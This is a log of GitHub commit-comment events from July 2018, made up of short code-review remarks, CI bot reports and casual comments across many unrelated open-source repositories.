{"id":"8003648235","type":"CommitCommentEvent","actor":{"login":"Alex-302"},"repo":{"name":"AdguardTeam/AdguardFilters"},"payload":{"comment":{"id":29799689,"position":null,"line":null,"path":null,"commit_id":"959ae4e1472642be49357552dba867c43c17253f","created_at":"2018-07-23T12:41:39Z","updated_at":"2018-07-23T12:41:39Z","author_association":"MEMBER","body":"why not `||musthird.com^$third-party` ?\r\nor\r\n``` \r\n||t1.musthird.com^$third-party\r\n||ss.musthird.com^$third-party\r\n```"}},"created_at":"2018-07-23T12:41:39Z"}
{"id":"8003650154","type":"CommitCommentEvent","actor":{"login":"sinhyungsup"},"repo":{"name":"jinsu3758/WorkersBill"},"payload":{"comment":{"id":29799697,"position":null,"line":null,"path":null,"commit_id":"fa2821bfd98d855a5990540ec6670fdb8ef9416d","created_at":"2018-07-23T12:42:03Z","updated_at":"2018-07-23T12:42:03Z","author_association":"COLLABORATOR","body":"ddd"}},"created_at":"2018-07-23T12:42:03Z"}
{"id":"8003653607","type":"CommitCommentEvent","actor":{"login":"ohartenstein23"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29799704,"position":null,"line":null,"path":null,"commit_id":"3400679ce5ec9b941481769f333f585ca8e42821","created_at":"2018-07-23T12:42:42Z","updated_at":"2018-07-23T12:42:42Z","author_association":"OWNER","body":"When an item creates an explosion, it can spawn a unit based on the following ruleset parameters:\r\n```\r\nitems:\r\n  - type: STR_UNIT_SPAWNING_ITEM\r\n    spawnUnit: STR_SPAWNED_UNIT # Default empty, defines which unit will be spawned\r\n    spawnUnitFaction: -1 # Default -1 = same faction as the unit who used the item, if no unit it spawns as enemy.  Otherwise 0 = player, 1 = enemy, 2 = civilian\r\n```\r\nIf an item is grenade battleType, part of a mapblock, spawns a unit, and set with a timer of 0 at the beginning of battle, it will explode and create its unit before the battle starts.  Player units spawned by items will not count for the purposes of determining if the player has lost the battle by losing all their units.  They will also be removed from the battle and therefore not recovered. Enemy units behave as normal for whether or not the battle is over."}},"created_at":"2018-07-23T12:42:42Z"}
{"id":"8003653731","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/cli"},"payload":{"comment":{"id":29799705,"position":null,"line":null,"path":null,"commit_id":"9b9a8b40674584e9ce82ecbcff2d99dbae2be024","created_at":"2018-07-23T12:42:43Z","updated_at":"2018-07-23T12:42:43Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:speak_no_evil: we don’t have additional insights for this pull request\nTo view a full list of the events <a href='https://github.com/codefresh-io/cli/pull/211/checks?check_run_id=8787437'>click there</a>\n"}},"created_at":"2018-07-23T12:42:43Z"}
{"id":"8003657177","type":"CommitCommentEvent","actor":{"login":"krOoze"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":29799708,"position":14,"line":6990,"path":"xml/vk.xml","commit_id":"6377124f371f9d8b1d9761b1116fac647222a13d","created_at":"2018-07-23T12:43:25Z","updated_at":"2018-07-23T12:43:25Z","author_association":"CONTRIBUTOR","body":"justification should be provided"}},"created_at":"2018-07-23T12:43:25Z"}
{"id":"8003660417","type":"CommitCommentEvent","actor":{"login":"giacomofiorin"},"repo":{"name":"Colvars/colvars"},"payload":{"comment":{"id":29799709,"position":null,"line":null,"path":null,"commit_id":"acdf3228bc9439df108fad935cd6c20d06a0b526","created_at":"2018-07-23T12:44:04Z","updated_at":"2018-07-23T12:44:04Z","author_association":"MEMBER","body":"Looking again, one thing seems apparent: the PDB I/O routines have become too complex because they do not have clearly separated code paths.  A good fraction of the commits involving them (before and after the move to GitHub) have generated errors further down the road due to unforeseen use cases.\r\n\r\nI want to address this, first by merging as much as possible the VMD and NAMD versions, which are almost duplicates.  Then, by separating the various conditions into different versions of `load_atoms()` and `load_coords()`.  Deviations from all of the accepted use cases should be easier to handle then.\r\n\r\nCan you upload into the top-level `tests` folder an input for the use cases that you are trying to support with this change?  I presume it is the input used by @flblanc (issue #161), but any other case would be useful."}},"created_at":"2018-07-23T12:44:04Z"}
{"id":"8003664745","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29799715,"position":6,"line":1162,"path":"src/main/external-resources/DMS.conf","commit_id":"c7e745a999273895dd951f6d02206448c27d0029","created_at":"2018-07-23T12:44:53Z","updated_at":"2018-07-23T12:44:53Z","author_association":"CONTRIBUTOR","body":"Merge issues:\r\n**the the**"}},"created_at":"2018-07-23T12:44:53Z"}
{"id":"8003664891","type":"CommitCommentEvent","actor":{"login":"Quimoniz"},"repo":{"name":"readex-eu/libfreqgen"},"payload":{"comment":{"id":29799716,"position":14,"line":22,"path":"src/freq_gen.c","commit_id":"51837c8dd6ee89a02f87f01af2a82c47c250d583","created_at":"2018-07-23T12:44:55Z","updated_at":"2018-07-23T12:44:55Z","author_association":"NONE","body":"why isn't `false` returned at the end?"}},"created_at":"2018-07-23T12:44:55Z"}
{"id":"8003665854","type":"CommitCommentEvent","actor":{"login":"ekohl"},"repo":{"name":"mattman578/puppetlabs-postgresql"},"payload":{"comment":{"id":29799721,"position":null,"line":null,"path":null,"commit_id":"27a48138c9c2d6d3727f9dda7a25e2ffd15d9d4e","created_at":"2018-07-23T12:45:08Z","updated_at":"2018-07-23T12:45:08Z","author_association":"NONE","body":"That sounds like you're trying to run Puppet 4 code with Puppet 3."}},"created_at":"2018-07-23T12:45:08Z"}
{"id":"8003666156","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29799722,"position":8,"line":1164,"path":"src/main/external-resources/DMS.conf","commit_id":"c7e745a999273895dd951f6d02206448c27d0029","created_at":"2018-07-23T12:45:11Z","updated_at":"2018-07-23T12:45:11Z","author_association":"CONTRIBUTOR","body":"**down down**"}},"created_at":"2018-07-23T12:45:11Z"}
{"id":"8003666487","type":"CommitCommentEvent","actor":{"login":"MadeYoga"},"repo":{"name":"MadeYoga/Nano-Bot"},"payload":{"comment":{"id":29799724,"position":null,"line":null,"path":null,"commit_id":"89890674e9908ebab5b50d28c4ad87f6779bdecb","created_at":"2018-07-23T12:45:15Z","updated_at":"2018-07-23T12:45:15Z","author_association":"OWNER","body":"Update:\r\n-> 25% default volume \r\n-> Fixed \"volume\" bug"}},"created_at":"2018-07-23T12:45:15Z"}
{"id":"8003666975","type":"CommitCommentEvent","actor":{"login":"Quimoniz"},"repo":{"name":"readex-eu/libfreqgen"},"payload":{"comment":{"id":29799728,"position":30,"line":38,"path":"src/freq_gen.c","commit_id":"51837c8dd6ee89a02f87f01af2a82c47c250d583","created_at":"2018-07-23T12:45:21Z","updated_at":"2018-07-23T12:45:21Z","author_association":"NONE","body":"why isn't `false` returned at the end?"}},"created_at":"2018-07-23T12:45:21Z"}
{"id":"8003673220","type":"CommitCommentEvent","actor":{"login":"iamfateh"},"repo":{"name":"iamfateh/magento2"},"payload":{"comment":{"id":29799753,"position":13,"line":19,"path":"composer.json","commit_id":"c5fceda9e5f41346f96b05fb86c7bf6f1a455ec0","created_at":"2018-07-23T12:46:33Z","updated_at":"2018-07-23T12:46:33Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-23T12:46:33Z"}
{"id":"8003675361","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29799757,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-23T12:47:00Z","updated_at":"2018-07-23T12:47:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T12:47:00Z"}
{"id":"8003681028","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29799768,"position":27,"line":43,"path":"code/drasil-lang/Language/Drasil/Development/Unit.hs","commit_id":"0081c9c57865eda8945186d35fc6e8e4408a2bc4","created_at":"2018-07-23T12:48:06Z","updated_at":"2018-07-23T12:48:06Z","author_association":"COLLABORATOR","body":"It's not centered. I just want it to align with the `udefn = ud`, so that it's obvious that there are two functions belonging to `IsUnit`."}},"created_at":"2018-07-23T12:48:06Z"}
{"id":"8003684789","type":"CommitCommentEvent","actor":{"login":"alwaysAn0n"},"repo":{"name":"Bitcoin-com/bitbox-javascript-sdk"},"payload":{"comment":{"id":29799776,"position":null,"line":null,"path":null,"commit_id":"b68f0279fbf4645aca5f5e8e2b49a87454f6111d","created_at":"2018-07-23T12:48:49Z","updated_at":"2018-07-23T12:48:49Z","author_association":"NONE","body":"Beautiful! Thanks for this.\r\n\r\n@GitCash send @cgcardona 5 bucks !"}},"created_at":"2018-07-23T12:48:49Z"}
{"id":"8003684943","type":"CommitCommentEvent","actor":{"login":"GitCash"},"repo":{"name":"Bitcoin-com/bitbox-javascript-sdk"},"payload":{"comment":{"id":29799777,"position":null,"line":null,"path":null,"commit_id":"b68f0279fbf4645aca5f5e8e2b49a87454f6111d","created_at":"2018-07-23T12:48:51Z","updated_at":"2018-07-23T12:48:51Z","author_association":"NONE","body":"Hey **cgcardona**, user **alwaysAn0n** tipped you **6165 bits** in Bitcoin Cash ( ~ **$5** ).\r\r*[Click here to claim it!](https://gitcash.io/claim/cgcardona)*\r\rYou can also add the \"thumbs down\" reaction to **alwaysAn0n**'s comment above to prevent future tips."}},"created_at":"2018-07-23T12:48:51Z"}
{"id":"8003689407","type":"CommitCommentEvent","actor":{"login":"andrei-agulescu"},"repo":{"name":"andrei-agulescu/colorpicker"},"payload":{"comment":{"id":29799788,"position":null,"line":null,"path":null,"commit_id":"be1b438a7bbfd56ecdda03c89b06a0a12cead746","created_at":"2018-07-23T12:49:42Z","updated_at":"2018-07-23T12:49:42Z","author_association":"OWNER","body":"i have removed the incorrect font-family attribute value because it is included in the .fa class specified on the i element."}},"created_at":"2018-07-23T12:49:42Z"}
{"id":"8003696839","type":"CommitCommentEvent","actor":{"login":"sim0504"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29799806,"position":66,"line":87,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-23T12:51:08Z","updated_at":"2018-07-23T12:51:08Z","author_association":"MEMBER","body":"Si tu ajoutes un clamp ca devrait fonctionner en autant que l'angle soit spécifier a partir de l'axe x négatif"}},"created_at":"2018-07-23T12:51:08Z"}
{"id":"8003698785","type":"CommitCommentEvent","actor":{"login":"manlinar"},"repo":{"name":"manlinar/my-travel-plans"},"payload":{"comment":{"id":29799808,"position":null,"line":null,"path":null,"commit_id":"5b4c7468c4fb45bc551f05a9170c04ba09e19acc","created_at":"2018-07-23T12:51:31Z","updated_at":"2018-07-23T12:51:31Z","author_association":"OWNER","body":"Add destinations to animation headings"}},"created_at":"2018-07-23T12:51:31Z"}
{"id":"8003700896","type":"CommitCommentEvent","actor":{"login":"akhiladreddy"},"repo":{"name":"akhiladreddy/SampleLearning"},"payload":{"comment":{"id":29799812,"position":null,"line":null,"path":null,"commit_id":"ce4a30b48223c5c17a09164628e732eb948a4008","created_at":"2018-07-23T12:51:54Z","updated_at":"2018-07-23T12:51:54Z","author_association":"OWNER","body":"kk"}},"created_at":"2018-07-23T12:51:54Z"}
{"id":"8003702436","type":"CommitCommentEvent","actor":{"login":"aphillips"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29799816,"position":83,"line":1415,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T12:52:11Z","updated_at":"2018-07-23T12:52:11Z","author_association":"OWNER","body":"Sensitivity vs insensitivity is tough for me too. Maybe case folded is a better choice."}},"created_at":"2018-07-23T12:52:11Z"}
{"id":"8003704892","type":"CommitCommentEvent","actor":{"login":"EricWF"},"repo":{"name":"google/benchmark"},"payload":{"comment":{"id":29799820,"position":null,"line":null,"path":null,"commit_id":"a6a1b0d765b116bb9c777d45a299ae84a2760981","created_at":"2018-07-23T12:52:40Z","updated_at":"2018-07-23T12:52:40Z","author_association":"COLLABORATOR","body":"*Doing it with a decent package manager is an exception. But  my experience on OS X and Windows hasn't been so ideal."}},"created_at":"2018-07-23T12:52:40Z"}
{"id":"8003708139","type":"CommitCommentEvent","actor":{"login":"MikhailTymchukDX"},"repo":{"name":"DevExpress-Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-entitydatasource-ef-e3251"},"payload":{"comment":{"id":29799827,"position":null,"line":null,"path":null,"commit_id":"26e1d7ec531db5229a8716ff245a8804cddeb78a","created_at":"2018-07-23T12:53:17Z","updated_at":"2018-07-23T12:53:17Z","author_association":"NONE","body":"Hi @DovMiller \r\nI don't see any VB code in the CS folder: https://github.com/DevExpress-Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-entitydatasource-ef-e3251/tree/15.1.3%2B/CS/WebSite\r\nWould you please share the link you mentioned?"}},"created_at":"2018-07-23T12:53:17Z"}
{"id":"8003710694","type":"CommitCommentEvent","actor":{"login":"aphillips"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29799833,"position":89,"line":1421,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T12:53:46Z","updated_at":"2018-07-23T12:53:46Z","author_association":"OWNER","body":"No, because the strings are being used for comparison and not stored or shown to the user. I should have a note to that effect so that people don't think we are recommending NFD everywhere!"}},"created_at":"2018-07-23T12:53:46Z"}
{"id":"8003711189","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29799834,"position":5,"line":4,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T12:53:52Z","updated_at":"2018-07-23T12:53:52Z","author_association":"OWNER","body":"The entry constructor of this library."}},"created_at":"2018-07-23T12:53:52Z"}
{"id":"8003718660","type":"CommitCommentEvent","actor":{"login":"jamesaoverton"},"repo":{"name":"rctauber/robot"},"payload":{"comment":{"id":29799844,"position":13,"line":43,"path":"robot-command/src/main/java/org/obolibrary/robot/TemplateCommand.java","commit_id":"d0613b9bc0e1206c59b32bd5c1549039077c79f8","created_at":"2018-07-23T12:55:13Z","updated_at":"2018-07-23T12:55:13Z","author_association":"COLLABORATOR","body":"This was option was \"a\" in release 1.0.0. We can't change it now."}},"created_at":"2018-07-23T12:55:13Z"}
{"id":"8003721194","type":"CommitCommentEvent","actor":{"login":"andreineculau"},"repo":{"name":"tobiipro/aws-util-firecloud"},"payload":{"comment":{"id":29799850,"position":null,"line":null,"path":null,"commit_id":"2609838142d311a9640e554f56a2b5b773d60525","created_at":"2018-07-23T12:55:40Z","updated_at":"2018-07-23T12:55:40Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-23T12:55:40Z"}
{"id":"8003724805","type":"CommitCommentEvent","actor":{"login":"jamesaoverton"},"repo":{"name":"rctauber/robot"},"payload":{"comment":{"id":29799853,"position":22,"line":52,"path":"robot-core/src/main/java/org/obolibrary/robot/MergeOperation.java","commit_id":"d0613b9bc0e1206c59b32bd5c1549039077c79f8","created_at":"2018-07-23T12:56:21Z","updated_at":"2018-07-23T12:56:21Z","author_association":"COLLABORATOR","body":"We can't drop signatures once we've released them."}},"created_at":"2018-07-23T12:56:21Z"}
{"id":"8003728142","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29799854,"position":7,"line":6,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T12:56:59Z","updated_at":"2018-07-23T12:56:59Z","author_association":"OWNER","body":"Using a safe factory to prevent accidental call without the `new` keyword."}},"created_at":"2018-07-23T12:56:59Z"}
{"id":"8003730961","type":"CommitCommentEvent","actor":{"login":"wangming5122460"},"repo":{"name":"wangming5122460/wugong"},"payload":{"comment":{"id":29799856,"position":null,"line":null,"path":null,"commit_id":"5eae46eb4e0ffc6e3c95ebd35f5c92dcb83d7272","created_at":"2018-07-23T12:57:31Z","updated_at":"2018-07-23T12:57:31Z","author_association":"OWNER","body":"44444444"}},"created_at":"2018-07-23T12:57:31Z"}
{"id":"8003731794","type":"CommitCommentEvent","actor":{"login":"wangming5122460"},"repo":{"name":"wangming5122460/wugong"},"payload":{"comment":{"id":29799857,"position":null,"line":null,"path":null,"commit_id":"5eae46eb4e0ffc6e3c95ebd35f5c92dcb83d7272","created_at":"2018-07-23T12:57:41Z","updated_at":"2018-07-23T12:57:41Z","author_association":"OWNER","body":"4444444"}},"created_at":"2018-07-23T12:57:41Z"}
{"id":"8003733716","type":"CommitCommentEvent","actor":{"login":"Stratus3D"},"repo":{"name":"asdf-vm/asdf-erlang"},"payload":{"comment":{"id":29799858,"position":null,"line":null,"path":null,"commit_id":"716d94174956ccbb0f771febe87e02c8df09ba56","created_at":"2018-07-23T12:58:01Z","updated_at":"2018-07-23T12:58:01Z","author_association":"CONTRIBUTOR","body":"I reverted this change because someone complained about the additional dependencies required for building the docs. I think it's better to allow people to disable docs than mandate docs for all. I could add some logic around this so we only set it unless the user overrides it by setting another environment variable (e.g. `NO_BUILD_DOCS=true` then unset `KERL_BUILD_DOCS`) but that seems like more work than it would be worth. Better docs in the readme are always good though."}},"created_at":"2018-07-23T12:58:01Z"}
{"id":"8003735628","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29799862,"position":10,"line":9,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T12:58:19Z","updated_at":"2018-07-23T12:58:19Z","author_association":"OWNER","body":"Prevent the infinite recursive call by passing the constructor to itself."}},"created_at":"2018-07-23T12:58:19Z"}
{"id":"8003740999","type":"CommitCommentEvent","actor":{"login":"ramlotia"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29799873,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T12:59:18Z","updated_at":"2018-07-23T12:59:18Z","author_association":"NONE","body":"It'good project"}},"created_at":"2018-07-23T12:59:18Z"}
{"id":"8003743138","type":"CommitCommentEvent","actor":{"login":"dubzzz"},"repo":{"name":"trekhleb/javascript-algorithms"},"payload":{"comment":{"id":29799877,"position":null,"line":null,"path":null,"commit_id":"76c172b20ba10981c9808b29a07d2391e963fda3","created_at":"2018-07-23T12:59:42Z","updated_at":"2018-07-23T12:59:42Z","author_association":"CONTRIBUTOR","body":"Oh, so sorry I should have updated the documentation accordingly :) "}},"created_at":"2018-07-23T12:59:42Z"}
{"id":"8003752684","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29799904,"position":39,"line":39,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Ide.TypeSystem/MonoDevelopRuleSetManager.cs","commit_id":"60b0f2bb2147f15ca41ad2f9afb22a22c56c6919","created_at":"2018-07-23T13:01:26Z","updated_at":"2018-07-23T13:01:26Z","author_association":"MEMBER","body":"typo: `GlobalRulesetFileName`"}},"created_at":"2018-07-23T13:01:26Z"}
{"id":"8003755694","type":"CommitCommentEvent","actor":{"login":"matthew-robertson"},"repo":{"name":"gaydryad/vore-tracker"},"payload":{"comment":{"id":29799910,"position":null,"line":null,"path":null,"commit_id":"d25e855eb437a25fbe00f26fd2cb4b8c6543f8a3","created_at":"2018-07-23T13:02:01Z","updated_at":"2018-07-23T13:02:01Z","author_association":"NONE","body":"You really, really, don't want to post your bot's API key on GitHub like this. Since this is publicly accessible, absolutely anyone can impersonate your bot using this key (I made this mistake before, don't be like me.)."}},"created_at":"2018-07-23T13:02:01Z"}
{"id":"8003757696","type":"CommitCommentEvent","actor":{"login":"Ranakhanbd"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29799913,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T13:02:24Z","updated_at":"2018-07-23T13:02:24Z","author_association":"NONE","body":"Very nice project"}},"created_at":"2018-07-23T13:02:24Z"}
{"id":"8003758121","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29799914,"position":4,"line":72,"path":"code/drasil-example/Drasil/GamePhysics/Body.hs","commit_id":"e7f75cae299266fd62481d407ad8822505a5b75b","created_at":"2018-07-23T13:02:29Z","updated_at":"2018-07-23T13:02:29Z","author_association":"COLLABORATOR","body":"This has been solved in 7b209a26d9baee132ecd7e891c6063fe7b1fd6ec."}},"created_at":"2018-07-23T13:02:29Z"}
{"id":"8003763617","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29799940,"position":11,"line":10,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:03:31Z","updated_at":"2018-07-23T13:03:31Z","author_association":"OWNER","body":"Avoid over-nested instances."}},"created_at":"2018-07-23T13:03:31Z"}
{"id":"8003766631","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29799945,"position":12,"line":110,"path":"code/drasil-example/Drasil/GlassBR/Body.hs","commit_id":"e7f75cae299266fd62481d407ad8822505a5b75b","created_at":"2018-07-23T13:04:03Z","updated_at":"2018-07-23T13:04:03Z","author_association":"COLLABORATOR","body":"Ok. Next time I will create the common function first."}},"created_at":"2018-07-23T13:04:03Z"}
{"id":"8003766745","type":"CommitCommentEvent","actor":{"login":"Barristar7"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29799946,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T13:04:05Z","updated_at":"2018-07-23T13:04:05Z","author_association":"NONE","body":"awesome concept"}},"created_at":"2018-07-23T13:04:05Z"}
{"id":"8003773303","type":"CommitCommentEvent","actor":{"login":"INNERWISH"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29799956,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T13:05:20Z","updated_at":"2018-07-23T13:05:20Z","author_association":"NONE","body":"Nice, amazing and awesome project. This will certainly change the blockchain technology in cryptosphere."}},"created_at":"2018-07-23T13:05:20Z"}
{"id":"8003773752","type":"CommitCommentEvent","actor":{"login":"CoderLCSY"},"repo":{"name":"CoderLCSY/GITIEDATest"},"payload":{"comment":{"id":29799957,"position":3,"line":3,"path":"README.md","commit_id":"117e47feb293ae8d85866e1f0b95bfdef8b938cc","created_at":"2018-07-23T13:05:24Z","updated_at":"2018-07-23T13:05:24Z","author_association":"OWNER","body":"网页添加"}},"created_at":"2018-07-23T13:05:24Z"}
{"id":"8003774826","type":"CommitCommentEvent","actor":{"login":"dashimaki360"},"repo":{"name":"OneNightROBOCON/onigiri_war"},"payload":{"comment":{"id":29799960,"position":null,"line":null,"path":null,"commit_id":"2b54a07e1a377161d28d52d1e933033e8385a6a4","created_at":"2018-07-23T13:05:37Z","updated_at":"2018-07-23T13:05:37Z","author_association":"CONTRIBUTOR","body":"ロボットの制御ノードから直接審判に通信するのは避けたい｡\r\n\r\nそれやったら\r\nscripts/sim_with_judge.shでは\r\nstate を stop で止めておいて\r\n\r\nscripts/start.sh　で\r\nonigiri_war_judge/test_scripts/set_running.shをたたいて　state を start にするほうが良さそう｡"}},"created_at":"2018-07-23T13:05:37Z"}
{"id":"8003777719","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29799966,"position":13,"line":12,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:06:10Z","updated_at":"2018-07-23T13:06:10Z","author_association":"OWNER","body":"An advanced using of its own prototype function."}},"created_at":"2018-07-23T13:06:10Z"}
{"id":"8003777826","type":"CommitCommentEvent","actor":{"login":"protyposis"},"repo":{"name":"bitmovin/bitmovin-analytics-collector"},"payload":{"comment":{"id":29799967,"position":null,"line":null,"path":null,"commit_id":"b2f9aa88148155608e793766c957706a94081667","created_at":"2018-07-23T13:06:11Z","updated_at":"2018-07-23T13:06:11Z","author_association":"COLLABORATOR","body":"`changed some types` is not very informative. Please use more expressive descriptions, in this case it could be `Add player typings`"}},"created_at":"2018-07-23T13:06:11Z"}
{"id":"8003786640","type":"CommitCommentEvent","actor":{"login":"gudipatiharitha"},"repo":{"name":"motech-implementations/nms"},"payload":{"comment":{"id":29799988,"position":4,"line":230,"path":"region/src/main/java/org/motechproject/nms/region/service/impl/LocationServiceImpl.java","commit_id":"4358f768899797ef34a9e4e858582d2a8dc93e94","created_at":"2018-07-23T13:07:50Z","updated_at":"2018-07-23T13:07:50Z","author_association":"CONTRIBUTOR","body":"If findby taluka is buggy - we should add a comment saying so "}},"created_at":"2018-07-23T13:07:50Z"}
{"id":"8003792674","type":"CommitCommentEvent","actor":{"login":"gudipatiharitha"},"repo":{"name":"motech-implementations/nms"},"payload":{"comment":{"id":29799998,"position":9,"line":616,"path":"rch/src/main/java/org/motechproject/nms/rch/service/impl/RchWebServiceFacadeImpl.java","commit_id":"725866fb53254c4e69182c8fc31131cac6fd2d04","created_at":"2018-07-23T13:08:56Z","updated_at":"2018-07-23T13:08:56Z","author_association":"CONTRIBUTOR","body":"Better not merge and better to create separate pull request form master"}},"created_at":"2018-07-23T13:08:56Z"}
{"id":"8003794907","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29800000,"position":null,"line":null,"path":null,"commit_id":"538ca047b79b503bff14a30846006f9914443ac4","created_at":"2018-07-23T13:09:23Z","updated_at":"2018-07-23T13:09:23Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/94/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/94//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/538ca047b79b503bff14a30846006f9914443ac4/94/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/538ca047b79b503bff14a30846006f9914443ac4/94/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/538ca047b79b503bff14a30846006f9914443ac4/94/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/538ca047b79b503bff14a30846006f9914443ac4/94/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-23T13:09:23Z"}
{"id":"8003795327","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29800001,"position":14,"line":14,"path":"omod/src/test/java/org/openmrs/module/msfcore/api/MSFCoreServiceTest.java","commit_id":"5f25d1f5d29251a37202318cafeaca4e7f3e0eec","created_at":"2018-07-23T13:09:28Z","updated_at":"2018-07-23T13:09:28Z","author_association":"COLLABORATOR","body":"did you see this @lauravignoli for unit testing getAllConceptAnswers?"}},"created_at":"2018-07-23T13:09:28Z"}
{"id":"8003795756","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29800002,"position":21,"line":20,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:09:32Z","updated_at":"2018-07-23T13:09:32Z","author_association":"OWNER","body":"This provides a way to attach functions to the prototype of a constructor, and, of course, itself as well."}},"created_at":"2018-07-23T13:09:32Z"}
{"id":"8003798033","type":"CommitCommentEvent","actor":{"login":"jonnew"},"repo":{"name":"jonnew/open-ephys-pcie"},"payload":{"comment":{"id":29800006,"position":null,"line":null,"path":null,"commit_id":"63a2a68a4d7b74a395a699a53059497b3e0ed3b9","created_at":"2018-07-23T13:09:56Z","updated_at":"2018-07-23T13:09:56Z","author_association":"OWNER","body":"Can you tell us what board you are referring to in these commits (headstage-64). Also please capitalize the first word of the sentence."}},"created_at":"2018-07-23T13:09:56Z"}
